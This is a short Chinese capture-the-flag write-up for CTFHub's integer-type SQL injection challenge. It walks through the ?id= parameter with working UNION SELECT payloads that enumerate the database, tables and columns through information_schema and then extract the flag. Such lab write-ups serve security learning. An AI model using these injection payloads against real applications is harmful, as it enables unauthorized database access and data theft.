CTFHub SQL注入 整数型注入

CTFHub SQL注入 整数型注入

强烈推荐这个网站 CTFhub https://www.ctfhub.com/
分各个类别,题目由易到难

这题还是很基础的,有各种提示
打开是源码,?id=处存在注入
/?id=1 or 1=1
CTFHub SQL注入 整数型注入_第1张图片
然后就是爆数据库名,information_schema三步
以下是详细步骤:

  1. ?id=1 or 1=1 union select 1,database()
    CTFHub SQL注入 整数型注入_第2张图片得到数据库名为sqli
    2.?id=1 or 1=1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'
    CTFHub SQL注入 整数型注入_第3张图片
    回显得到表名
    3、
?id=1 or 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='143232859127690'

在这里插入图片描述得到字段名flag
4.

?id=1 or 1=1 union select 1,group_concat(flag) from sqli.143232859127690

CTFHub SQL注入 整数型注入_第4张图片得到flag

你可能感兴趣的:(WriteUp)